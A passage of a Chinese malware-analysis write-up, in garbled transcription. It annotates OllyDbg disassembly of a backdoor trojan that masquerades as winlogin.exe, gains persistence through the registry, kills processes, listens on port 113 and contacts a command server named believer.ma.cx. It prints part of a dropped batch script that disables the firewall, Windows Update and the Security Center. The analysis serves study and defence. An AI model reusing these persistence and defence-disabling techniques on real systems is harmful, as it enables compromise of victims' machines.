0040DBB0 > 8D85 78F7FFFF lea eax,dword ptr ss:[ebp-888] 0040DBB6. 50 push eax 0040DBB push DBBC. FF15 D call dword ptr ds
|
|
|
- 簪京改 蒋
- 5 years ago
- Views:
Transcription
1 文章标题 分析某一后门类木马 文章作者 ximo[lcg] 文章目标 某一后门类木马 相关工具 ollydbg 作者 Q Q 作者邮箱 @163.com 作者主页 文章日期 2008 年 12 月 3 日 木马的总体流程 : 0040DB23 / 55 push ebp 0040DB24. 8BEC mov ebp,esp 0040DB26. 81EC 8C sub esp,98c 0040DB2C. 53 push ebx 0040DB2D. 33DB xor ebx,ebx 0040DB2F. 56 push esi 0040DB push edi 0040DB D FC mov dword ptr ss:[ebp-4],ebx 0040DB D F0 mov dword ptr ss:[ebp-10],ebx 0040DB37. C745 F4 89C64000 mov dword ptr ss:[ebp-c],3.0040c DB3E. FF75 F4 push dword ptr ss:[ebp-c] 0040DB41. 64:FF push dword ptr fs:[0] 0040DB48. 64: mov dword ptr fs:[0],esp 0040DB4F. 391D C0D44200 cmp dword ptr ds:[42d4c0],ebx 0040DB je short DB5C 0040DB57. E8 B2C4FFFF call A00E ; 创建批处理 a.bat 0040DB5C > 8B mov esi,dword ptr ds:[<&kernel32.gettickcount>] ; kernel32.gettickcount 0040DB62. FFD6 call esi ; GetTickCount 0040DB64. 33D2 xor edx,edx 0040DB66. B9 E mov ecx,3e8 0040DB6B. F7F1 div ecx 0040DB6D. A3 609B5100 mov dword ptr ds:[519b60],eax 0040DB72. FFD6 call esi ; GetTickCount 0040DB push eax 0040DB75. E8 1D call E DB7A. 59 pop ecx 0040DB7B. E8 E3AEFFFF call A63 ; 动态获取 API 函数 0040DB80. 6A 02 push DB82. FF15 045B4400 call dword ptr ds:[445b04] ; kernel32.seterrormode 0040DB push 7530 ; /Timeout = ms 0040DB8D. 68 C4D44200 push D4C4 ; /MutexName = "Lindi" 0040DB push ebx ; InitialOwner 0040DB push ebx ; psecurity 0040DB94. FF call dword ptr ds:[<&kernel32.createmutexa>] ; \CreateMutexA 0040DB9A. 50 push eax ; 建立 lindi 互斥体 0040DB9B. FF call dword ptr ds:[<&kernel32.waitforsingleobject>] ; \ 等上 30 秒 0040DBA1. 3D cmp eax, DBA jnz short DBB0 ; 检查是否存在, 存在则 结束进程 0040DBA8. 6A 01 push 1 ; /ExitCode = DBAA. FF call dword ptr ds:[<&kernel32.exitprocess>] ; \ExitProcess
2 0040DBB0 > 8D85 78F7FFFF lea eax,dword ptr ss:[ebp-888] 0040DBB6. 50 push eax 0040DBB push DBBC. FF15 D call dword ptr ds:[4459d0] ; ws2_32.wsastartup 0040DBC2. 3BC3 cmp eax,ebx 0040DBC F4 mov dword ptr ss:[ebp-c],eax 0040DBC7. 0F85 1F jnz E1EC 0040DBCD. 80BD 78F7FFFF 02 cmp byte ptr ss:[ebp-888],2 0040DBD4. 0F85 0C jnz E1E6 0040DBDA. 33C0 xor eax,eax 0040DBDC. 8A85 79F7FFFF mov al,byte ptr ss:[ebp-887] 0040DBE2. 3C 02 cmp al,2 0040DBE4. 0F85 FC jnz E1E6 0040DBEA. BE mov esi, DBEF. 8D85 0CFCFFFF lea eax,dword ptr ss:[ebp-3f4] 0040DBF5. 56 push esi ; /BufSize => 104 (260.) 0040DBF6. 50 push eax ; Buffer 0040DBF7. FF call dword ptr ds:[<&kernel32.getsystemdirectorya>] ; \GetSystemDirectoryA 0040DBFD. 8D85 10FDFFFF lea eax,dword ptr ss:[ebp-2f0] 0040DC push esi ; /BufSize => 104 (260.) 0040DC push eax ; PathBuffer 0040DC push ebx ; /pmodule 0040DC06. FF15 E call dword ptr ds:[<&kernel32.getmodulehandlea>] ; \GetModuleHandleA 0040DC0C. 50 push eax ; hmodule 0040DC0D. FF call dword ptr ds:[<&kernel32.getmodulefilenamea>] ; \GetModuleFileNameA 0040DC13. 8D85 08F9FFFF lea eax,dword ptr ss:[ebp-6f8] 0040DC push eax 0040DC1A. 8D85 08FAFFFF lea eax,dword ptr ss:[ebp-5f8] 0040DC push eax 0040DC push ebx 0040DC22. 8D85 10FDFFFF lea eax,dword ptr ss:[ebp-2f0] 0040DC push ebx 0040DC push eax 0040DC2A. E8 19A80000 call DC2F. 8D85 08F9FFFF lea eax,dword ptr ss:[ebp-6f8] 0040DC push eax 0040DC36. 8D85 08FAFFFF lea eax,dword ptr ss:[ebp-5f8] 0040DC3C. 50 push eax 0040DC3D D4200 push D04 ; ASCII "%s%s" 0040DC42. 8D85 08FBFFFF lea eax,dword ptr ss:[ebp-4f8] 0040DC push esi 0040DC push eax 0040DC4A. E8 6B call BA ; 取得系统路径 0040DC4F. 8D85 0CFCFFFF lea eax,dword ptr ss:[ebp-3f4] 0040DC push eax 0040DC56. 8D85 10FDFFFF lea eax,dword ptr ss:[ebp-2f0] 0040DC5C. 50 push eax 0040DC5D. E8 AE call DC62. 83C4 30 add esp, DC65. 85C0 test eax,eax 0040DC67. 0F85 B jnz DE DC6D. 391D D09C5100 cmp dword ptr ds:[519cd0],ebx
3 0040DC73. BE 08D54200 mov esi,3.0042d508 ; ASCII "winlogin.exe" 0040DC je short DCAB 0040DC7A. 56 push esi 0040DC7B. 33FF xor edi,edi 0040DC7D. E8 BE call DC82. 83E8 04 sub eax,4 0040DC pop ecx 0040DC je short DCAB 0040DC88 > E /call EA1 0040DC8D. 6A 1A push 1A 0040DC8F. 99 cdq 0040DC pop ecx 0040DC91. F7F9 idiv ecx 0040DC push esi 0040DC94. 80C2 61 add dl, DC D54200 mov byte ptr ds:[edi+42d508],dl 0040DC9D. 47 inc edi 0040DC9E. E8 9D call DCA3. 83E8 04 sub eax,4 0040DCA6. 59 pop ecx 0040DCA7. 3BF8 cmp edi,eax 0040DCA9.^ 72 DD \jb short DC DCAB > 8D85 0CFCFFFF lea eax,dword ptr ss:[ebp-3f4] 0040DCB1. 56 push esi 0040DCB2. 50 push eax 0040DCB3. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] 0040DCB9. 68 AC push AC ; ASCII "%s\%s" 0040DCBE. 50 push eax 0040DCBF. E call E DCC4. 83C4 10 add esp, DCC7. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] 0040DCCD. 50 push eax ; /FileName 0040DCCE. FF15 8C call dword ptr ds:[<&kernel32.getfileattributesa>] ; \GetFileAttributesA 0040DCD4. 83F8 FF cmp eax, DCD je short DCEB 0040DCD9. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] 0040DCDF push 80 ; /FileAttributes = NORMAL 0040DCE4. 50 push eax ; FileName 0040DCE5. FF call dword ptr ds:[<&kernel32.setfileattributesa>] ; \SetFileAttributesA 0040DCEB > 8B35 4C mov esi,dword ptr ds:[<&kernel32.copyfilea>] ; kernel32.copyfilea 0040DCF1. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] ; 把病毒复制到 C:\WINDOWS\system32\winlogin.exe 目录下 0040DCF7. 53 push ebx 0040DCF8. 50 push eax 0040DCF9. 8D85 10FDFFFF lea eax,dword ptr ss:[ebp-2f0] 0040DCFF. 33FF xor edi,edi 0040DD push eax 0040DD02 > FFD6 /call esi 0040DD04. 85C0 test eax,eax 0040DD jnz short DD3B 0040DD08. FF call dword ptr ds:[<&kernel32.getlasterror>] ; GetLastError
4 0040DD0E. 3BFB cmp edi,ebx 0040DD jnz short DD3B 0040DD12. 83F8 20 cmp eax, DD je short DD1C 0040DD17. 83F8 05 cmp eax,5 0040DD1A. 75 1F jnz short DD3B 0040DD1C > 6A 01 push DD1E. 5F pop edi 0040DD1F A0000 push 3A98 ; /Timeout = ms 0040DD24. FF15 5C call dword ptr ds:[<&kernel32.sleep>] ; \Sleep 0040DD2A. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] ; 等待 15 秒 0040DD push ebx 0040DD push eax 0040DD32. 8D85 10FDFFFF lea eax,dword ptr ss:[ebp-2f0] 0040DD push eax 0040DD39.^ EB C7 \jmp short DD DD3B > 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] 0040DD push eax 0040DD42. E8 79C0FFFF call DC0 ; 取 explorer.exe 的时间, 并使 winlogin.exe 时间与之相同 0040DD pop ecx 0040DD48. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] 0040DD4E. 6A 07 push 7 ; /FileAttributes = READONLY HIDDEN SYSTEM 0040DD push eax ; FileName 0040DD51. FF call dword ptr ds:[<&kernel32.setfileattributesa>] ; \SetFileAttributesA 0040DD57. 6A 10 push 10 ; 修改 winlogin.exe 属 性, 设置为只读, 隐藏, 系统属性 0040DD59. 8D45 DC lea eax,dword ptr ss:[ebp-24] 0040DD5C. 53 push ebx 0040DD5D. 50 push eax 0040DD5E. E8 5D call EC0 0040DD63. 6A 44 push DD65. 8D85 18FFFFFF lea eax,dword ptr ss:[ebp-e8] 0040DD6B. 5E pop esi 0040DD6C. 56 push esi 0040DD6D. 53 push ebx 0040DD6E. 50 push eax 0040DD6F. E8 4C call EC0 0040DD74. 83C4 18 add esp, DD77. 89B5 18FFFFFF mov dword ptr ss:[ebp-e8],esi 0040DD7D. C785 24FFFFFF E80C>mov dword ptr ss:[ebp-dc], ce8 0040DD87. 66:899D 48FFFFFF mov word ptr ss:[ebp-b8],bx 0040DD8E. 6A 01 push DD90. 5E pop esi 0040DD91. 89B5 44FFFFFF mov dword ptr ss:[ebp-bc],esi 0040DD97. FF call dword ptr ds:[<&kernel32.getcurrentprocessid>] ; [GetCurrentProcessId 0040DD9D. 50 push eax ; /ProcessId 0040DD9E. 56 push esi ; Inheritable => TRUE 0040DD9F push ; Access = SYNCHRONIZE 0040DDA4. FF15 E call dword ptr ds:[<&kernel32.openprocess>] ; \OpenProcess
5 0040DDAA. 8D8D 10FDFFFF lea ecx,dword ptr ss:[ebp-2f0] ; 打开进程 0040DDB0. 51 push ecx 0040DDB1. 50 push eax 0040DDB2. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] 0040DDB8. 50 push eax 0040DDB9. 8D85 74F6FFFF lea eax,dword ptr ss:[ebp-98c] ; 一串乱码 0040DDBF push ; ASCII "%s %d "%s"" 0040DDC4. 50 push eax ; 还是乱码 0040DDC5. E8 7B call E DDCA. 83C4 14 add esp, DDCD. 8D45 DC lea eax,dword ptr ss:[ebp-24] 0040DDD0. 50 push eax ; /pprocessinfo 0040DDD1. 8D85 18FFFFFF lea eax,dword ptr ss:[ebp-e8] ; 0040DDD7. 50 push eax ; pstartupinfo 0040DDD8. 8D85 0CFCFFFF lea eax,dword ptr ss:[ebp-3f4] ; 0040DDDE. 50 push eax ; CurrentDir 0040DDDF. 53 push ebx ; penvironment 0040DDE0. 6A 28 push 28 ; CreationFlags = DETACHED_PROCESS NORMAL_PRIORITY_CLASS 0040DDE2. 56 push esi ; InheritHandles => TRUE 0040DDE3. 53 push ebx ; pthreadsecurity 0040DDE4. 8D85 74F6FFFF lea eax,dword ptr ss:[ebp-98c] ; 0040DDEA. 53 push ebx ; pprocesssecurity 0040DDEB. 50 push eax ; CommandLine 0040DDEC. 8D85 14FEFFFF lea eax,dword ptr ss:[ebp-1ec] ; 0040DDF2. 50 push eax ; ModuleFileName 0040DDF3. FF call dword ptr ds:[<&kernel32.createprocessa>] ; \CreateProcessA 0040DDF9. 85C0 test eax,eax ; 创建 winlogin.exe 文件 进程 0040DDFB je short DE DDFD. 68 C push 0C8 ; /Timeout = 200. ms 0040DE02. FF15 5C call dword ptr ds:[<&kernel32.sleep>] ; \Sleep 0040DE08. FF75 DC push dword ptr ss:[ebp-24] ; /hobject 0040DE0B. 8B35 6C mov esi,dword ptr ds:[<&kernel32.closehandle>] ; kernel32.closehandle 0040DE11. FFD6 call esi ; \CloseHandle 0040DE13. FF75 E0 push dword ptr ss:[ebp-20] ; /hobject 0040DE16. FFD6 call esi ; \CloseHandle 0040DE18. FF15 B call dword ptr ds:[4459b8] ; ws2_32.wsacleanup 0040DE1E. 53 push ebx ; /ExitCode 0040DE1F. FF call dword ptr ds:[<&kernel32.exitprocess>] ; \ 退出当前进程 0040DE25 > 833D 489F cmp dword ptr ds:[519f48],2 0040DE2C. 7E 43 jle short DE DE2E. A1 4C9F5100 mov eax,dword ptr ds:[519f4c] 0040DE33. FF70 04 push dword ptr ds:[eax+4] 0040DE36. E call AF 0040DE3B. 59 pop ecx 0040DE3C. 8BF0 mov esi,eax 0040DE3E. 6A FF push -1 ; /Timeout = INFINITE 0040DE push esi ; hobject 0040DE41. FF call dword ptr ds:[<&kernel32.waitforsingleobject>] ; \WaitForSingleObject 0040DE push esi ; /hobject
6 0040DE48. FF15 6C call dword ptr ds:[<&kernel32.closehandle>] ; \CloseHandle 0040DE4E. A1 4C9F5100 mov eax,dword ptr ds:[519f4c] 0040DE cmp dword ptr ds:[eax+8],ebx 0040DE je short DE DE D push 7D0 ; /Timeout = ms 0040DE5D. FF15 5C call dword ptr ds:[<&kernel32.sleep>] ; \Sleep 0040DE63. A1 4C9F5100 mov eax,dword ptr ds:[519f4c] 0040DE68. FF70 08 push dword ptr ds:[eax+8] ; /FileName 0040DE6B. FF call dword ptr ds:[<&kernel32.deletefilea>] ; \DeleteFileA 0040DE71 > 391D 2CD44200 cmp dword ptr ds:[42d42c],ebx 0040DE je short DE8E 0040DE D 285B4400 cmp dword ptr ds:[445b28],ebx 0040DE7F. 75 0D jnz short DE8E 0040DE81. 8D85 08FBFFFF lea eax,dword ptr ss:[ebp-4f8] 0040DE push eax 0040DE88. E8 F8D5FFFF call B485 ; 创建三个注册表项, 以实 现木马的自启动 0040DE8D. 59 pop ecx 0040DE8E > 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DE C push C 0040DE push eax 0040DE9A. E8 A68F0000 call E DE9F. 53 push ebx 0040DEA0. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DEA6. 53 push ebx 0040DEA7. 50 push eax 0040DEA8. E8 448A0000 call F1 0040DEAD. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DEB3. 50 push eax 0040DEB4. E8 BDD3FFFF call B276 ; 取当前系统时间 0040DEB B0000 push 0B DEBE. 53 push ebx 0040DEBF A74400 push A DEC4. E8 F78F0000 call EC0 0040DEC9. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DECF. 68 E push E0 0040DED4. 50 push eax 0040DED5. E8 6B8F0000 call E DEDA. 53 push ebx 0040DEDB. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DEE1. 6A 01 push DEE3. 50 push eax 0040DEE4. E8 088A0000 call F1 0040DEE9. 83C4 38 add esp, DEEC. 8BF8 mov edi,eax 0040DEEE. 8B mov esi,dword ptr ds:[<&kernel32.createthread>] ; kernel32.createthread 0040DEF4. 8D45 FC lea eax,dword ptr ss:[ebp-4] 0040DEF7. 50 push eax ; /pthreadid 0040DEF8. 53 push ebx ; CreationFlags 0040DEF9. 53 push ebx ; pthreadparm 0040DEFA push ; ThreadFunction =
7 0040DEFF. 53 push ebx ; StackSize 0040DF push ebx ; psecurity 0040DF01. FFD6 call esi ; \ 创建线程, 使每 30 秒查 找目标的进程, 查到则结束之 0040DF03. 69FF imul edi,edi, DF09. 3BC3 cmp eax,ebx 0040DF0B C4B44400 mov dword ptr ds:[edi+44b4c4],eax 0040DF B jnz short DF2E 0040DF13. FF call dword ptr ds:[<&kernel32.getlasterror>] ; GetLastError 0040DF push eax 0040DF1A. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DF C push C 0040DF push eax 0040DF26. E8 1A8F0000 call E DF2B. 83C4 0C add esp,0c 0040DF2E > 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DF push eax 0040DF35. E8 3CD3FFFF call B276 ; 取当前系统时间 0040DF3A. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DF40. C mov dword ptr ss:[esp], DF push eax 0040DF48. E8 F88E0000 call E DF4D. 53 push ebx 0040DF4E. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DF54. 6A 01 push DF push eax 0040DF57. E call F1 0040DF5C. 83C4 14 add esp, DF5F. 8BF8 mov edi,eax 0040DF61. 8D45 FC lea eax,dword ptr ss:[ebp-4] 0040DF push eax 0040DF push ebx 0040DF push ebx 0040DF push DF6C. 53 push ebx 0040DF6D. 53 push ebx 0040DF6E. FFD6 call esi ; 创建线程, 使实现一些破 坏活动, 具体见下 0040DF70. 69FF imul edi,edi, DF76. 3BC3 cmp eax,ebx 0040DF C4B44400 mov dword ptr ds:[edi+44b4c4],eax 0040DF7E. 75 1B jnz short DF9B 0040DF80. FF call dword ptr ds:[<&kernel32.getlasterror>] ;GetLastError 0040DF push eax 0040DF87. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DF8D. 68 FC push FC 0040DF push eax 0040DF93. E8 AD8E0000 call E DF98. 83C4 0C add esp,0c 0040DF9B > 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DFA1. 50 push eax 0040DFA2. E8 CFD2FFFF call B276
8 0040DFA7. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DFAD. C70424 BC mov dword ptr ss:[esp], bc 0040DFB4. 50 push eax 0040DFB5. E8 8B8E0000 call E DFBA. 53 push ebx 0040DFBB. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040DFC1. 6A 01 push DFC3. 50 push eax 0040DFC4. E call F1 0040DFC9. 83C4 14 add esp, DFCC. 8BF8 mov edi,eax 0040DFCE. 8D45 FC lea eax,dword ptr ss:[ebp-4] 0040DFD1. 50 push eax 0040DFD2. 8D85 08FBFFFF lea eax,dword ptr ss:[ebp-4f8] 0040DFD8. 53 push ebx 0040DFD9. 50 push eax 0040DFDA. 68 F5B44000 push B4F5 0040DFDF. 53 push ebx 0040DFE0. 53 push ebx 0040DFE1. FFD6 call esi ; 创建实现自启动的线程 0040DFE3. 69FF imul edi,edi, DFE9. 3BC3 cmp eax,ebx 0040DFEB C4B44400 mov dword ptr ds:[edi+44b4c4],eax 0040DFF B jnz short E00E 0040DFF3. FF call dword ptr ds:[<&kernel32.getlasterror>] ;GetLastError 0040DFF9. 50 push eax 0040DFFA. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040E push E push eax 0040E006. E8 3A8E0000 call E E00B. 83C4 0C add esp,0c 0040E00E > 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040E push eax 0040E015. E8 5CD2FFFF call B E01A. 6A 02 push E01C. E8 188B0000 call B E pop ecx 0040E C0 test eax,eax 0040E pop ecx 0040E C jnz short E E027. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040E02D. 68 2C push C 0040E push eax 0040E033. E8 0D8E0000 call E E push ebx 0040E039. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040E03F. 6A 02 push E push eax 0040E042. E8 AA call F1 0040E C4 14 add esp, E04A. 8BF8 mov edi,eax
9 0040E04C. 8D45 FC lea eax,dword ptr ss:[ebp-4] 0040E04F. 50 push eax 0040E push ebx 0040E push edi 0040E C94000 push C E push ebx 0040E push ebx 0040E059. FFD6 call esi ; 创建监听 113 端口, 并接 受远程服务器发送来的命令的线程 0040E05B. 69FF imul edi,edi, E061. 3BC3 cmp eax,ebx 0040E C4B44400 mov dword ptr ds:[edi+44b4c4],eax 0040E B jnz short E E06B. FF call dword ptr ds:[<&kernel32.getlasterror>] ; GetLastError 0040E push eax 0040E072. 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040E E82F4300 push FE8 0040E07D. 50 push eax 0040E07E. E8 C28D0000 call E E C4 0C add esp,0c 0040E086 > 8D85 5CFFFFFF lea eax,dword ptr ss:[ebp-a4] 0040E08C. 50 push eax 0040E08D. E8 E4D1FFFF call B E pop ecx 0040E093 > E8 098E0000 call EA1 0040E098. 6A 7F push 7F 0040E09A. 68 F0D44200 push D4F0 ; ASCII "believer.ma.cx" 0040E09F. 68 6C9B5100 push B6C ; ASCII "believer.ma.cx" 0040E0A4. 891D EC9C5100 mov dword ptr ds:[519cec],ebx 0040E0AA. E8 F19C0000 call DA0 0040E0AF. A1 10D44200 mov eax,dword ptr ds:[42d410] 0040E0B4. 6A 3F push 3F 0040E0B6. BF EC9B5100 mov edi, bec ; ASCII "#591" 0040E0BB D54200 push D500 ; ASCII "#591" 0040E0C0. 57 push edi 0040E0C1. A3 BC9C5100 mov dword ptr ds:[519cbc],eax 0040E0C6. E8 D59C0000 call DA0 0040E0CB. 6A 3F push 3F 0040E0CD. BE 2C9C5100 mov esi, c2c 0040E0D2. 68 D89C5100 push CD8 0040E0D7. 56 push esi 0040E0D8. E8 C39C0000 call DA0 0040E0DD. 83C4 24 add esp, E0E0. 891D C09C5100 mov dword ptr ds:[519cc0],ebx 0040E0E6 > 895D F8 /mov dword ptr ss:[ebp-8],ebx 0040E0E9 > 391D 405B4400 /cmp dword ptr ds:[445b40],ebx 0040E0EF jnz short E E0F1. 8D45 EC lea eax,dword ptr ss:[ebp-14] 0040E0F4. 53 push ebx 0040E0F5. 50 push eax
10 0040E0F6. FF15 9C call dword ptr ds:[44599c] ;wininet.internetgetconnectedstate 0040E0FC. 85C0 test eax,eax 0040E0FE jnz short E E push E105. EB 2C jmp short E E107 > B5100 push B E10C. 891D E89C5100 mov dword ptr ds:[519ce8],ebx 0040E112. E8 DE call E1F5 ; 连接 believer.ma.cx 远程 服务器 0040E F8 02 cmp eax,2 ; 0040E11A F4 mov dword ptr ss:[ebp-c],eax 0040E11D. 0F84 BE je E1E1 0040E D E89C5100 cmp dword ptr ds:[519ce8],ebx 0040E je short E12E 0040E12B. FF4D F8 dec dword ptr ss:[ebp-8] 0040E12E > 68 B80B0000 push 0BB8 ; /Timeout = ms 0040E133 > FF15 5C call dword ptr ds:[<&kernel32.sleep>] ; \Sleep 0040E139. FF45 F8 inc dword ptr ss:[ebp-8] 0040E13C. 837D F8 06 cmp dword ptr ss:[ebp-8],6 0040E140.^ 7C A7 \jl short E0E9 0040E D F4 02 cmp dword ptr ss:[ebp-c],2 0040E146. 0F je E1E1 0040E14C. 395D F0 cmp dword ptr ss:[ebp-10],ebx 0040E14F je short E E151. 6A 7F push 7F 0040E F0D44200 push D4F0 ; ASCII "believer.ma.cx" 0040E C9B5100 push B6C ; ASCII "believer.ma.cx" 0040E15D. E8 3E9C0000 call DA0 0040E162. A1 10D44200 mov eax,dword ptr ds:[42d410] 0040E167. 6A 3F push 3F 0040E D54200 push D500 ; ASCII "#591" 0040E16E. 57 push edi 0040E16F. A3 BC9C5100 mov dword ptr ds:[519cbc],eax 0040E174. E8 279C0000 call DA0 0040E179. 6A 3F push 3F 0040E17B. 68 D89C5100 push CD8 0040E push esi 0040E181. E8 1A9C0000 call DA0 0040E C4 24 add esp, E D F0 mov dword ptr ss:[ebp-10],ebx 0040E18C.^ E9 55FFFFFF jmp E0E6 0040E191 > 381D DC9C5100 cmp byte ptr ds:[519cdc],bl 0040E197.^ 0F84 49FFFFFF je E0E6 0040E19D. 6A 7F push 7F 0040E19F. 68 DC9C5100 push CDC 0040E1A C9B5100 push B6C ; ASCII "believer.ma.cx" 0040E1A9. E8 F29B0000 call DA0 0040E1AE. A1 14D44200 mov eax,dword ptr ds:[42d414] 0040E1B3. 6A 3F push 3F 0040E1B5. 68 E09C5100 push CE0 0040E1BA. 57 push edi
11 0040E1BB. A3 BC9C5100 mov dword ptr ds:[519cbc],eax 0040E1C0. E8 DB9B0000 call DA0 0040E1C5. 6A 3F push 3F 0040E1C7. 68 E49C5100 push CE4 0040E1CC. 56 push esi 0040E1CD. E8 CE9B0000 call DA0 0040E1D2. 83C4 24 add esp, E1D5. C745 F mov dword ptr ss:[ebp-10],1 0040E1DC.^ E9 05FFFFFF \jmp E0E6 0040E1E1 > E8 D call ABA 0040E1E6 > FF15 B call dword ptr ds:[4459b8] ; ws2_32.wsacleanup 0040E1EC > 5F pop edi 0040E1ED. 5E pop esi 0040E1EE. 33C0 xor eax,eax 0040E1F0. 5B pop ebx 0040E1F1. C9 leave 0040E1F2 \. C retn 10 具体的各部分内容 : 一 创建批处理 0040A00E / 55 push ebp ; 创建 a.bat 0040A00F. 8BEC mov ebp,esp 0040A011. B mov eax, A016. E8 A5D60000 call C0 0040A01B. 56 push esi 0040A01C. 57 push edi 0040A01D. B9 C mov ecx,5c1 0040A022. BE 40A04200 mov esi,3.0042a040 ; ASCII "@echo off Echo REGEDIT4>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg Echo "TransportBindName"="">>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MA" A027. 8DBD A0E7FFFF lea edi,dword ptr ss:[ebp-1860] ; 批处理内容 0040A02D. 8D85 A8FEFFFF lea eax,dword ptr ss:[ebp-158] 0040A033. F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi] 0040A :A5 movs word ptr es:[edi],word ptr ds:[esi] 0040A A04200 push A034 ; ASCII "c:\a.bat" 0040A03C. 50 push eax ; 批处理创建的路径 0040A03D. A4 movs byte ptr es:[edi],byte ptr ds:[esi] 0040A03E. E8 02CE0000 call E A pop ecx 0040A F6 xor esi,esi 0040A pop ecx 0040A047. 8D85 A8FEFFFF lea eax,dword ptr ss:[ebp-158] 0040A04D. 56 push esi ; /htemplatefile => NULL 0040A04E. 56 push esi ; Attributes => A04F. 6A 02 push 2 ; Mode =
12 CREATE_ALWAYS 0040A push esi ; psecurity => NULL 0040A push esi ; ShareMode => A push ; Access = GENERIC_WRITE 0040A push eax ; FileName 0040A059. FF call dword ptr ds:[<&kernel32.createfilea>] ; \CreateFileA 0040A05F. 8BF8 mov edi,eax ; 创建 a.bat 0040A061. 3BFE cmp edi,esi 0040A jbe short A0C8 0040A065. 8D45 FC lea eax,dword ptr ss:[ebp-4] 0040A push esi 0040A push eax 0040A06A. 8D85 A0E7FFFF lea eax,dword ptr ss:[ebp-1860] 0040A push eax 0040A071. E8 CAD50000 call A pop ecx ; 0040A push eax ; nbytestowrite 0040A078. 8D85 A0E7FFFF lea eax,dword ptr ss:[ebp-1860] ; 0040A07E. 50 push eax ; Buffer 0040A07F. 57 push edi ; hfile 0040A080. FF call dword ptr ds:[<&kernel32.writefile>] ; \WriteFile 0040A push edi ; / 写入内容 0040A087. FF15 6C call dword ptr ds:[<&kernel32.closehandle>] ; \CloseHandle 0040A08D. 6A 44 push A08F. 8D45 B8 lea eax,dword ptr ss:[ebp-48] 0040A092. 5F pop edi 0040A push edi 0040A push esi 0040A push eax 0040A096. E8 25CE0000 call EC0 0040A09B. 83C4 0C add esp,0c 0040A09E. 8D4D A8 lea ecx,dword ptr ss:[ebp-58] 0040A0A1. 897D B8 mov dword ptr ss:[ebp-48],edi 0040A0A4. 66:8975 E8 mov word ptr ss:[ebp-18],si 0040A0A8. 6A 01 push A0AA. 58 pop eax 0040A0AB. 51 push ecx ; /pprocessinfo 0040A0AC. 8D4D B8 lea ecx,dword ptr ss:[ebp-48] ; 0040A0AF. 51 push ecx ; pstartupinfo 0040A0B0. 56 push esi ; CurrentDir => NULL 0040A0B1. 56 push esi ; penvironment => NULL 0040A0B2. 6A 28 push 28 ; CreationFlags = DETACHED_PROCESS NORMAL_PRIORITY_CLASS 0040A0B E4 mov dword ptr ss:[ebp-1c],eax ; 0040A0B7. 50 push eax ; InheritHandles => TRUE 0040A0B8. 56 push esi ; pthreadsecurity => NULL 0040A0B9. 8D85 A8FEFFFF lea eax,dword ptr ss:[ebp-158] ; 0040A0BF. 56 push esi ; pprocesssecurity => NULL 0040A0C0. 50 push eax ; CommandLine
13 0040A0C1. 56 push esi ; ModuleFileName => NULL 0040A0C2. FF call dword ptr ds:[<&kernel32.createprocessa>] ; \CreateProcessA 0040A0C8 > 5F pop edi ; 创建进程, 删除批处理 文件 0040A0C9. 5E pop esi 0040A0CA. C9 leave 0040A0CB \. C3 retn 批处理内容为 off Echo REGEDIT4>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg Echo "TransportBindName"="">>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg Echo "Start"=dword: >>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg Echo "Start"=dword: >>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>%temp%\1.reg Echo "Start"=dword: >>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg Echo "EnableDCOM"="N">>%temp%\1.reg Echo "EnableRemoteConnect"="N">>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%temp%\1.reg Echo "restrictanonymous"=dword: >>%temp%\1.reg Echo.>>%temp%\1.reg Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT1.0\Server]>>% temp%\1.reg Echo "Enabled"=hex:00>>%temp%\1.reg Echo.>>%temp%\1.reg Echo 